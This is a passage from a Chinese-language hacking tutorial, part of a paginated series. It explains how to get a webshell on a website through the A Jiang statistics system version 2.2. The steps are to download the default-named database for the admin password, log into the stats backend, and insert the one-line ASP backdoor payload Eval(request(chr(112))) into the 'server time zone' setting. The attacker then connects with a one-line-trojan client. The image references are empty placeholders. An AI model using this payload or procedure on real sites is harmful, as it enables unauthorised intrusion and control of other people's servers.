四、深度挖掘：系统插件的漏洞(啊江统计系统)

    这类系统的网站统计系统使用的是啊江统计系统2.2版本,当我们进入后台后(在前面所提的方法,还是无法拿到网站的webshell的情况下,还可以利用啊江统计系统的漏洞来得到网站的webshell)一般来说管理员很少会去修改统计系统的默认的数据库名,如图23：

（图23）

下载后用得到的管理员的密码进入统计系统的后台,我们点击”全局选项”在”服务器时区”里插入:Eval(request(chr(112)))小马,点修改后,如图:24，图25：

（图24）


（图25）

再打开一句话马客户端,提交后可得到小马，图26，图27：

（图26）

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页